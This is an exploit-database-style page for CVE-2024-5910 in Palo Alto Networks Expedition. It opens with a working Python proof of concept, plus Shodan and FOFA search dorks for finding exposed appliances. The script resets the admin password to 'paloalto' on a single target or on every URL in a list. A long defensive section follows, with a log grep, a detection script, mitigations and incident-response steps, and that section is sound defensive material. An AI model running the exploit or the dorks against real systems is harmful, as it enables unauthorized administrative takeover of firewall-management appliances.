Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover

Exploit Author: ByteHunter
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: Python
Published Date: 2025-04-06
# Exploit Title: Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover
# Shodan Dork: html:"expedition project"
# FOFA Dork: "expedition project" && icon_hash="1499876150"
# Exploit Author: ByteHunter
# Email: 0xByteHunter@proton.me
# Vulnerable Versions: 1.2 < 1.2.92
# Tested on: 1.2.90.1 & 1.2.75
# CVE : CVE-2024-5910

import requests
import argparse
import warnings

from requests.packages.urllib3.exceptions import InsecureRequestWarning
warnings.simplefilter("ignore", InsecureRequestWarning)

ENDPOINT = '/OS/startup/restore/restoreAdmin.php'

def send_request(base_url):
    url = f"{base_url}{ENDPOINT}"
    print(f"Testing URL: {url}")
    try:
        # Certificate verification is disabled because appliances commonly use self-signed certificates.
        response = requests.get(url, verify=False, timeout=7)
        if response.status_code == 200:
            print("✓ Admin password restored to: 'paloalto'\n")
            print("✓ admin panel is now accessible via ==> admin:paloalto creds")
        else:
            print(f"Request failed with status code: {response.status_code}\n")
    except requests.exceptions.RequestException as e:
        print(f"Error sending request to {url}: {e}")

def main():
    parser = argparse.ArgumentParser(description='Palo Alto Expedition - Admin Account Password Reset PoC')
    parser.add_argument('-u', '--url', type=str, help='single target URL')
    parser.add_argument('-l', '--list', type=str, help='URL target list')

    args = parser.parse_args()

    if args.url:
        send_request(args.url)
    elif args.list:
        try:
            with open(args.list, 'r') as file:
                urls = file.readlines()
                for base_url in urls:
                    send_request(base_url.strip())
        except FileNotFoundError:
            print(f"File not found: {args.list}")
    else:
        print("I need a URL address with -u or a URL file list with -l.")

if __name__ == '__main__':
    main()


Palo Alto Networks Expedition 1.2.90.1 — Admin Account Takeover (CVE-2024-5910)

This article explains the critical vulnerability tracked as CVE-2024-5910 that affects Palo Alto Networks Expedition appliances prior to the patched 1.2.92 release. It covers what the flaw is, the impact to organisations, defensive detection strategies, mitigations and recommended incident response steps. The focus is on actionable guidance for defenders and administrators — not on exploitation techniques.

Summary and Impact

  • Vulnerability: An administrative account reset vulnerability in Palo Alto Networks Expedition appliances (pre-1.2.92).
  • CVE: CVE-2024-5910
  • Affected versions: Expedition 1.2.x releases earlier than 1.2.92 (confirmed on 1.2.90.1 and 1.2.75)
  • Risk: High — successful exploitation can result in administrative account takeover (password reset to a known value), enabling immediate administrative access to the appliance.
  • Attack surface: Management interface and web-accessible appliance functionality. Network exposure of management services increases risk.

Because the vulnerability can be used to reset privileged credentials, impacted systems are at immediate and severe risk: attackers who reach the vulnerable interface can gain admin access and subsequently manipulate configurations, exfiltrate data, or move laterally into the environment.

Why this is dangerous

  • Administrative access provides full control over the appliance and any integrated workflows or configurations.
  • Expedition is deployed in environments that manage firewall policies and configurations — tampering can introduce long-lived persistence or blind spots.
  • Publicly exposed management interfaces and weak network segmentation increase likelihood of remote exploitation.

Defensive indicators and detection guidance

Defenders should search for signs of misuse or attempted exploitation. The following are practical, non-exploitative detection tactics you can run in your environment.

  • Review web access logs: Look for anomalous requests to administrative restore/management paths and sudden POST/GET requests from unusual source IPs. Prioritise requests to management endpoints originating from outside expected administrative networks.
  • Check authentication logs: Identify unexpected admin logins, particularly right after suspicious web access attempts. Note source IPs, timestamps and user-agents.
  • Watch for credential changes: Alerts for password resets, creation of new admin users, or changes in authentication configuration should be investigated immediately.
  • File and configuration integrity: Compare current appliance configuration files against known good baselines. Unexpected changes may indicate compromise.
  • Network-level telemetry: Use IDS/IPS and web-proxy logs to flag management interface traffic from untrusted networks.

Example (defensive) log search patterns to find related web hits — run in a read-only manner on your logging server:

# Search web server or proxy logs for likely management endpoint access (example pattern)
grep -i "restoreAdmin" /var/log/httpd/*access_log* /var/log/nginx/*access.log*

Explanation: The command above searches logs for occurrences of the string "restoreAdmin", which is an indicator of requests targeting the administrative restore functionality. Adjust paths and patterns based on your logging architecture and appliance logging outputs.
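As an added illustration of the log-review guidance above (example code written for this page, not part of the original advisory or the PoC), the following script parses combined-format Apache/nginx access logs, flags every request to the restore endpoint named in the PoC, and rates each hit by response status and source network. The ADMIN_NETS ranges and the sample log lines are constructed placeholders; substitute your own administrative subnets and feed it real log lines.

```python
import ipaddress
import re

# Endpoint from the PoC above; compared case-insensitively with any query string removed.
RESTORE_PATH = "/os/startup/restore/restoreadmin.php"

# Assumed administrative source networks (placeholder values; replace with your own).
ADMIN_NETS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("192.168.50.0/24")]

# Apache/nginx "combined" log format: ip ident user [ts] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

def parse_line(line):
    """Parse one combined-format access log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_admin_source(ip):
    """True when the client address falls inside one of the expected admin networks."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in ADMIN_NETS)

def find_restore_hits(lines):
    """Return one finding per request to the restore endpoint.

    'high'  : status 200 (the condition the PoC treats as a successful reset) from a non-admin source
    'medium': status 200 from an admin network (verify it was a sanctioned action)
    'low'   : any other status (blocked or failed attempt, still worth recording)
    """
    findings = []
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["path"].split("?", 1)[0].lower() != RESTORE_PATH:
            continue
        status, admin = int(rec["status"]), is_admin_source(rec["ip"])
        severity = ("medium" if admin else "high") if status == 200 else "low"
        findings.append({"ip": rec["ip"], "ts": rec["ts"], "status": status,
                         "ua": rec["ua"], "admin_source": admin, "severity": severity})
    return findings

# Constructed sample lines (not real traffic) used to exercise the detector.
SAMPLE_LOG = [
    '10.0.0.15 - - [05/Apr/2025:09:12:01 +0000] "GET /index.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [05/Apr/2025:09:12:44 +0000] "GET /OS/startup/restore/restoreAdmin.php HTTP/1.1" 200 87 "-" "python-requests/2.31.0"',
    '10.0.0.15 - - [05/Apr/2025:09:15:00 +0000] "GET /OS/startup/restore/restoreAdmin.php?x=1 HTTP/1.1" 403 12 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in find_restore_hits(SAMPLE_LOG):
        print(f"[{f['severity'].upper()}] {f['ts']} {f['ip']} status={f['status']} ua={f['ua']}")
```

A 200 from an automation user-agent outside the admin networks, followed shortly by an admin login, is the pattern to escalate to incident response.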

Immediate mitigations (short-term)

If you operate Expedition instances and cannot immediately apply the vendor patch, apply the following containment controls to reduce exposure:

  • Network restrictions: Block public access to management ports and the appliance web UI using firewall rules or network ACLs. Limit management access to a small set of trusted IPs or an administrative jump host.
  • Isolate impacted hosts: If you suspect compromise, disconnect the appliance from networks where possible and place it in a monitored, isolated VLAN.
  • Change credentials: After investigation and ensuring no active malicious control, rotate all administrative credentials and API keys associated with the appliance. Ensure new passwords are strong and unique.
  • Enable multi-factor authentication (MFA): Where supported, require MFA for administrative access to reduce the value of credential theft.
  • Monitoring & alerting: Add real-time alerts for admin logins, password resets, and configuration changes.

Long-term remediation: patching and configuration

  • Apply vendor fixes: Upgrade Expedition to the fixed version (1.2.92 or later) as soon as vendor patches are available and validated in your environment.
  • Harden management plane: Place management interfaces on dedicated management networks, restrict access via VPN or bastion hosts, and use strict ACLs.
  • Principle of least privilege: Limit administrative accounts and use role-based access controls. Avoid widespread use of a single shared admin account.
  • Logging and retention: Ensure appliance and network logs are centralized and retained long enough to investigate incidents.
  • Configuration backups and integrity: Maintain secure, versioned backups of configuration with integrity checks to allow recovery and forensic comparison.

Incident response checklist

  • Detect: Correlate web logs, authentication events, and configuration changes around the suspected timeframe.
  • Contain: Restrict network access to the appliance and revoke exposed credentials.
  • Eradicate: Apply the vendor patch; remove any unauthorized accounts or scheduled tasks introduced by an attacker.
  • Recover: Restore known-good configuration from backups if integrity is in doubt, and revalidate administrative access controls.
  • Post-incident: Perform a root cause analysis, report to stakeholders, and implement additional controls (MFA, monitoring, segmentation).

Risk mitigation examples

Control                | Purpose                                     | Notes
-----------------------|---------------------------------------------|-----------------------------------------------------------------
Network access control | Limit who can reach the management interface | Use IP allowlists, VPN-only access, and restrict to admin subnets
Patch management       | Remove the known vulnerability               | Test and deploy the vendor-supplied 1.2.92+ update
MFA for admins         | Defend against credential misuse             | Prefer hardware or app-based MFA
Centralized logging    | Faster detection and forensic capability     | Include appliance logs and network gateway traffic

Coordination and responsible disclosure

If you discover evidence of exploitation, coordinate internally with your incident response team and, where appropriate, notify Palo Alto Networks support to obtain vendor guidance and patches. Follow legal and organisational policies around breach reporting and third-party disclosure.

Final recommendations for administrators

  • Prioritise patching Expedition appliances to the vendor-released fixed version (>= 1.2.92).
  • Assume internet-exposed management interfaces are high-risk and treat them accordingly.
  • Implement layered controls: network segmentation, MFA, least privilege, and centralized monitoring.
  • Practice incident response tabletop exercises that include compromise of management appliances to improve readiness.